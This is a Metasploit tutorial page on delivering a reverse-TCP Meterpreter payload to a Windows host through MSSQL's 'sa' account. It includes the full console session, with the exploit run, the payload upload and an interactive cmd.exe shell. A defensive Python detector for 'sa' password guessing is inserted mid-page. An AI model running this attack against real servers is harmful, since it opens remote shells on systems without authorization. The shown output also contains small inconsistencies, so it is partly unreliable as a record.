Metasploit: Delivering a Payload via MSSQL

In the previous section we created a very basic module to better understand the principles behind building one. This section briefly covers how to use the MSSQL module to deliver a payload. The code presented here works against the following Microsoft SQL Server installations: 2000, 2005 and 2008. We will first walk through the code and explain how this attack vector works, and then start from scratch.


When an administrator first installs MSSQL, they can choose either mixed-mode authentication or SQL-based authentication. With the latter, the administrator must set a password for the 'sa' account. The 'sa' account is the system administrator of the SQL server and holds most, if not all, privileges on the system. Guessing this password, whether through social engineering or other means, lets Metasploit use this attack vector and perform further actions. In an earlier module we discussed discovering which TCP port MSSQL is listening on by querying UDP port 1434, and running a dictionary attack to guess the 'sa' password.
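From the defender's side, the dictionary attack against 'sa' described above is visible in the SQL Server ERRORLOG as a burst of "Login failed for user 'sa'" entries from one client, optionally followed by a "Login succeeded" entry from the same client once the password is found. The script below is an added example, not part of the original page or of Metasploit's own code. It assumes the standard ERRORLOG line layout (timestamp, "Logon" source, message with a trailing "[CLIENT: ...]" tag), that the server's login auditing is set to record both failed and successful logins (otherwise only the failures appear), and that the embedded log excerpt is constructed sample data; the threshold and window values are arbitrary tuning choices.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed SQL Server ERRORLOG excerpt (sample data, not a real capture):
# six failed 'sa' logins from one client in a few seconds, then a success
# from the same client, plus an unrelated failure for another login.
SAMPLE_ERRORLOG = """\
2018-06-10 00:07:40.01 Logon       Error: 18456, Severity: 14, State: 8.
2018-06-10 00:07:40.01 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.10.1.103]
2018-06-10 00:07:42.03 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.10.1.103]
2018-06-10 00:07:44.07 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.10.1.103]
2018-06-10 00:07:46.11 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.10.1.103]
2018-06-10 00:07:48.20 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.10.1.103]
2018-06-10 00:07:50.33 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.10.1.103]
2018-06-10 00:07:52.12 Logon       Login succeeded for user 'sa'. Connection made using SQL Server authentication. [CLIENT: 10.10.1.103]
2018-06-10 00:08:10.55 Logon       Login failed for user 'reporting'. Reason: Password did not match that for the login provided. [CLIENT: 172.16.153.50]
"""

# Matches only the "Login failed/succeeded" message lines; the separate
# "Error: 18456" lines carry no user or client and are ignored.
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\.\d+\s+Logon\s+"
    r"Login (?P<result>failed|succeeded) for user '(?P<user>[^']+)'"
    r".*\[CLIENT: (?P<client>[^\]]+)\]"
)


def parse_logon_events(text):
    """Turn ERRORLOG text into a list of logon event dicts."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        events.append({
            "ts": datetime.strptime(m.group("ts"), "%Y-%m-%d %H:%M:%S"),
            "result": m.group("result"),
            "user": m.group("user"),
            "client": m.group("client"),
        })
    return events


def detect_sa_guessing(events, threshold=5, window=timedelta(minutes=1)):
    """Return alerts as (kind, client, timestamp) tuples.

    'sa_password_guessing'    : a client reached `threshold` failed 'sa'
                                logins inside `window` (dictionary attack).
    'sa_login_after_failures' : a client succeeded as 'sa' after having
                                failed within the window (likely guessed).
    """
    alerts = []
    failures = defaultdict(list)  # client -> recent failure timestamps
    for ev in sorted(events, key=lambda e: e["ts"]):
        if ev["user"] != "sa":
            continue  # only the 'sa' account is of interest here
        client = ev["client"]
        if ev["result"] == "failed":
            failures[client].append(ev["ts"])
            # Keep only failures that fall inside the sliding window.
            failures[client] = [t for t in failures[client]
                                if ev["ts"] - t <= window]
            if len(failures[client]) == threshold:
                alerts.append(("sa_password_guessing", client, ev["ts"]))
        elif failures[client]:
            alerts.append(("sa_login_after_failures", client, ev["ts"]))
    return alerts


if __name__ == "__main__":
    for kind, client, ts in detect_sa_guessing(parse_logon_events(SAMPLE_ERRORLOG)):
        print(f"{ts} {kind} from {client}")
```

Run against the constructed excerpt, the detector raises one guessing alert when the fifth failure from 10.10.1.103 arrives and a second alert when the same client then logs in successfully as 'sa'; the failure for the 'reporting' login is ignored. In a real deployment the same logic would be fed from the ERRORLOG file or the Windows Application log rather than an embedded string.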


For our purposes, we assume that we already know the SQL system administrator's account password. If you wish to recreate this attack, you will need a working copy of Microsoft Windows along with any of the MSSQL versions mentioned above.


Let's launch the attack:

msf > use windows/mssql/mssql_payload
msf exploit(mssql_payload) > options

Module options (exploit/windows/mssql/mssql_payload):

   Name                 Current Setting  Required  Description
   ----                 ---------------  --------  -----------
   METHOD               cmd              yes       Which payload delivery method to use (ps, cmd, or old)
   PASSWORD                              no        The password for the specified username
   RHOST                                 yes       The target address
   RPORT                1433             yes       The target port (TCP)
   SRVHOST              0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT              8080             yes       The local port to listen on.
   SSL                  false            no        Negotiate SSL for incoming connections
   SSLCert                               no        Path to a custom SSL certificate (default is randomly generated)
   TDSENCRYPTION        false            yes       Use TLS/SSL for TDS data "Force Encryption"
   URIPATH                               no        The URI to use for this exploit (default is random)
   USERNAME             sa               no        The username to authenticate as
   USE_WINDOWS_AUTHENT  false            yes       Use windows authentification (requires DOMAIN option set)


Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(mssql_payload) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(mssql_payload) > set LHOST 10.10.1.103
LHOST => 10.10.1.103
msf exploit(mssql_payload) > set RHOST 172.16.153.129
RHOST => 172.16.153.129
msf exploit(mssql_payload) > set LPORT 8080
LPORT => 8080
msf exploit(mssql_payload) > set PASSWORD ihazpassword
MSSQL_PASS => ihazpassword
msf exploit(mssql_payload) > exploit

[*] Started reverse handler on port 8080
[*] Warning: This module will leave QiRYOlUK.exe in the SQL Server %TEMP% directory
[*] Writing the debug.com loader to the disk...
[*] Converting the debug script to an executable...
[*] Uploading the payload, please be patient...
[*] Converting the encoded payload...
[*] Executing the payload...
[*] Sending stage (719360 bytes)
[*] Meterpreter session 1 opened (10.10.1.103:8080 -> 10.10.1.103:47384)

meterpreter > execute -f cmd.exe -i
Process 3740 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>
Published: 2018-06-10 00:07:52  Category: Metasploit
Last updated: 2018-06-10 00:07:52
Author: 付杰